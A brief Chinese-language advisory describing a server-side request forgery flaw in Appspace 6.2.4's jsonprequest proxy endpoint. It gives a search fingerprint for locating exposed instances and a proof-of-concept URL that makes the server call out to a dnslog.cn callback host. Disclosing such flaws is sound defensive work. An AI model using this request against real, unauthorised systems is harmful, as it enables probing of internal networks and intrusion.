漏洞描述
Appspace 6.2.4存在漏洞,允许通过api/v1/core/proxy/jsonprequest接口来进行服务端请求伪造,危害系统安全。
漏洞影响
Appspace 6.2.4
网络测绘
app=”Sign-in-to-Appspace-Core”
漏洞复现
登录页面为
验证POC
/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://lo2z02.dnslog.cn
© 版权声明
THE END
暂无评论内容